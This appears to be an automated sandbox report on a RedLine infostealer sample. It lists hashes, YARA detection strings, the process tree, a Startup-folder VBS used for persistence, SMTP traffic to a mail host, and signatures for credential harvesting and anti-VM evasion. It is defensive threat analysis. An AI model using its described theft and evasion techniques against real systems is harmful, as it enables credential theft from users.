Windows Analysis Report
q6utlq83i0.exe

Overview

General Information

Sample name:q6utlq83i0.exe
renamed because original name is a hash value
Original sample name:a0ce83972e16b826fc209b7272260aa7ca67b58cec13fb62c5285bde3ab7a257.exe
Analysis ID:1528987
MD5:2b2832a4e1bf4e26e59980f4162334e2
SHA1:a9ae9ed9b7804a21fc0cf1e6b0d7d2e9f18b8336
SHA256:a0ce83972e16b826fc209b7272260aa7ca67b58cec13fb62c5285bde3ab7a257
Tags:exe, RedLineStealer, user-adrian__luca
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • q6utlq83i0.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\q6utlq83i0.exe" MD5: 2B2832A4E1BF4E26E59980F4162334E2)
    • incalculability.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\q6utlq83i0.exe" MD5: 2B2832A4E1BF4E26E59980F4162334E2)
      • RegSvcs.exe (PID: 7376 cmdline: "C:\Users\user\Desktop\q6utlq83i0.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 7608 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • incalculability.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Local\inhumate\incalculability.exe" MD5: 2B2832A4E1BF4E26E59980F4162334E2)
      • RegSvcs.exe (PID: 7760 cmdline: "C:\Users\user\AppData\Local\inhumate\incalculability.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • incalculability.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\inhumate\incalculability.exe" MD5: 2B2832A4E1BF4E26E59980F4162334E2)
        • RegSvcs.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\inhumate\incalculability.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
Source: 00000005.00000002.1899832832.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Author: ditekSHen, Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 3C 88 44 24 2B 88 44 24 2F B0 C3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: 5.2.incalculability.exe.3b40000.1.raw.unpack, Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Author: ditekSHen, Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 3C 88 44 24 2B 88 44 24 2F B0 C3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.

System Summary

Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , ProcessId: 7608, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 198.54.122.135, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7376, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs" , ProcessId: 7608, ProcessName: wscript.exe

Data Obfuscation

Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\inhumate\incalculability.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs
No Suricata rule has matched

AV Detection

Source: q6utlq83i0.exeAvira: detected
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeAvira: detection malicious, Label: HEUR/AGEN.1321671
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeReversingLabs: Detection: 63%
Source: q6utlq83i0.exeReversingLabs: Detection: 63%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeJoe Sandbox ML: detected
Source: q6utlq83i0.exeJoe Sandbox ML: detected
Source: q6utlq83i0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: incalculability.exe, 00000001.00000003.1749762795.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000001.00000003.1747982807.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897663711.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897923919.0000000004580000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: incalculability.exe, 00000001.00000003.1749762795.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000001.00000003.1747982807.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897663711.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897923919.0000000004580000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 198.54.122.135:587
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 198.54.122.135 198.54.122.135
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: api.ipify.org
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 198.54.122.135:587
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004422FE InternetQueryDataAvailable,InternetReadFile,5_2_004422FE
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: mail.privateemail.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0045A10F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,5_2_0046DC80
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,5_2_0044C37A
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0047C81C

System Summary

Source: 5.2.incalculability.exe.3b40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000002.1899832832.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_00431BE8
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_00446313
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004333BE
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: String function: 004115D7 appears 36 times
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: String function: 00416C70 appears 39 times
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: String function: 00445AE0 appears 65 times
Source: q6utlq83i0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 5.2.incalculability.exe.3b40000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000002.1899832832.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: classification engineClassification label: mal100.spyw.expl.evad.winEXE@14/3@2/2
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0044AF6C GetLastError,FormatMessageW,5_2_0044AF6C
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004333BE
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,5_2_00464EAE
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,5_2_0045D619
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,5_2_004755C4
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,5_2_0047839D
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,5_2_0043305F
Source: C:\Users\user\Desktop\q6utlq83i0.exe File created: C:\Users\user\AppData\Local\inhumate
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
Source: C:\Users\user\Desktop\q6utlq83i0.exe File created: C:\Users\user\AppData\Local\Temp\endochylous
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs"
Source: q6utlq83i0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\q6utlq83i0.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\q6utlq83i0.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: q6utlq83i0.exeReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\q6utlq83i0.exe File read: C:\Users\user\Desktop\q6utlq83i0.exe
Source: unknownProcess created: C:\Users\user\Desktop\q6utlq83i0.exe "C:\Users\user\Desktop\q6utlq83i0.exe"
Source: C:\Users\user\Desktop\q6utlq83i0.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\Desktop\q6utlq83i0.exe"
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\q6utlq83i0.exe"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"
Source: C:\Users\user\Desktop\q6utlq83i0.exe Section loaded: apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, userenv.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Section loaded: apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, userenv.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, userenv.dll
Source: C:\Users\user\Desktop\q6utlq83i0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: q6utlq83i0.exe Static file information: File size 1301411 > 1048576
Source: Binary string: wntdll.pdbUGP source: incalculability.exe, 00000001.00000003.1749762795.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000001.00000003.1747982807.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897663711.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897923919.0000000004580000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: incalculability.exe, 00000001.00000003.1749762795.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000001.00000003.1747982807.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897663711.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897923919.0000000004580000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_0040EBD0 LoadLibraryA,GetProcAddress,5_2_0040EBD0
Source: incalculability.exe.0.dr Static PE information: real checksum: 0xa961f should be: 0x142e9f
Source: q6utlq83i0.exe Static PE information: real checksum: 0xa961f should be: 0x142e9f
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_00462463 push edi; ret 5_2_00462465
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_00416CB5 push ecx; ret 5_2_00416CC8
Source: C:\Users\user\Desktop\q6utlq83i0.exe File created: C:\Users\user\AppData\Local\inhumate\incalculability.exe

Boot Survival

Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_0047A330
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00434418
Source: C:\Users\user\Desktop\q6utlq83i0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe API/Special instruction interceptor: Address: 40FC2E4
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe API/Special instruction interceptor: Address: 3F28B04
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe API/Special instruction interceptor: Address: 3F39754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 3154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 4639
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-85712
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe API coverage: 3.8 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
